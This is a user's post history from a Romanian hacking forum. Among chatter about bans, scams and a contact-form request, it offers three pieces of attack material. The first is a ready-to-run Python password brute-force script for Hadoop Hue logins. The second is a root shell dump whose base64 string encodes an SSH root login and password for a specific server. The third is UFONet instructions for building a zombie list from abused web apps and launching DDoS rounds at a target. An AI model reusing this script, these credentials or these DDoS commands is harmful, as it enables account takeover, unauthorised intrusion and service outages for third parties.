loading...
Active Members-
Posts
182 -
Joined
-
Last visited
Everything posted by loading...
-
prost sunt, mai bine postam la market si dadeam o teapa de 100 daca stiam ca iese asa, in fine, imi revin eu, succes
-
raspunzi tot cu intrebare? edit// am muncti 5 ani pt voi am postat
-
shell-urile de la vip nu fac 100 euro?
-
ma confundati prieteni, eu nu-s ca restu de la mine din zona, daca va pretindeti la 100£ n-ati facut nimic
-
halal comunitate, bag pula in el dublu post, sanatate
-
nu e vorbab de respect, e vorba de probleme si a fost o cere, scoteti-mi ban-ul si va dau articole, m-a distrus
-
cu faza de la vip, daca era imi vindeam pc-ul dar vroiam sa raman cu voi, in fine
-
Salut, imi poate scrie cineva send.php pentru: <div id="tooplate_main"> <h4>Contact Form</h4> <form method="post" name="contact" action="#"> <label for="author">Name:</label> <input type="text" id="author" name="author" class="required input_field" /> <div class="cleaner h10"></div> <label for="email">Email:</label> <input type="text" class="validate-email required input_field" name="email" id="email" /> <div class="cleaner h10"></div> <label for="subject">Subject:</label> <input type="text" class="validate-subject required input_field" name="subject" id="subject"/> <div class="cleaner h10"></div> <label for="text">Message:</label> <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea> <div class="cleaner h10"></div> <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" /> <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" /> </form> </div> </div> cu redirect catre 'mesajtrimis.html' Multumesc
-
eu n-am primit nici un mail
-
done, de la mine era problema, aveam 2 tab-uri deschise +rep Kronzy
-
Coupon Per User Limit Exceeded
-
Salut, stie cineva cate ore/zile ti se incredinteaza masina la test drive BMW.. etc ? care sunt conditiile?
-
in titlu scrie Orange, nu Lebara
- 20 replies
-
- destinatie
- fel
-
(and 3 more)
Tagged with:
-
nici din Anglia nu se putea suna aseara
- 20 replies
-
- destinatie
- fel
-
(and 3 more)
Tagged with:
-
World Numbers - Global Telephone Numbers Redirected Anywhere
-
vezi aici,,, https://rstforums.com/forum/54068-sms-gateway.rst?highlight=sms+gateway https://rstforums.com/forum/80871-tutorial-cum-sa-ai-propriul-server-de-sms.rst?highlight=sms+gateway
-
Tocmai.ro Scraper [numar telefon + localitate + nume]
loading... replied to Byte-ul's topic in Programe utile
asta nu e ala de la V.I.P.? -
Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/pythonimport sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
-
//solved
-
link-urile cu galben sunt reclame platite, Google AdWords
-
- 6 replies
-
- brute force
- hack
-
(and 3 more)
Tagged with:
-
server1.local:~# uname -a Linux server1.local 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux server1.local:~# ls server1.local:~# uptime 04:14:51 up 15 days, 1:20, 1 user, load average: 0.00, 0.00, 0.00 server1.local:~# ls server1.local:~# cd server1.local:~# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz stepping : 6 cpu MHz : 2133.305 cache size : 6144 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm bogomips : 4270.03 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz stepping : 6 cpu MHz : 2133.305 cache size : 6144 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm bogomips : 4266.61 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: server1.local:~# c3NoIHJvb3RANzguNDcuNDUuMzQNCjFsMFZleTB1MTIz b64
-
Project info: - Package: UFOnet_v0.2b(.zip) - Code: Github / Sf Summary: UFONet - is a shell client designed to launch DDoS attacks against a target, using CSRF/XSS vectors on third party web applications, like botnet. It allows to use a proxy to manage 'zombies'. Installing: UFONet runs on many platforms. It requires Python and the following library: python-pycurl - Python bindings to libcurl On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl Testing botnet: Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. Urls of the 'zombies' should be like this: http://target.com/check?uri= After that, launch it: ./ufonet -t zombies.txt At the end of the process, you will be asked if you want to update the list automatically adding only 'vulnerable' web apps. Wanna update your list (Y/n) ------------- Examples: + with verbose: ./ufonet -t zombies.txt -v + with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118" Attacking a target: Enter the target to attack, with the number of rounds that will be attacked: ./ufonet -a http://target.comTarget -r 10 This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt", a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies', the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target. By default, if you don't put any round, it will apply only 1. Additionally, you can choose a place to recharge on target's site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn't use cache systems, this will do the attack more effective. ./ufonet -a http://target.com -b "/images/big_size_image.jpg" ------------- Examples: + with verbose: ./ufonet -a http://target.com -r 10 -v + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118" + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg" Source & Video: UFONet - DDoS attacks via Web Abuse (XSS/CSRF)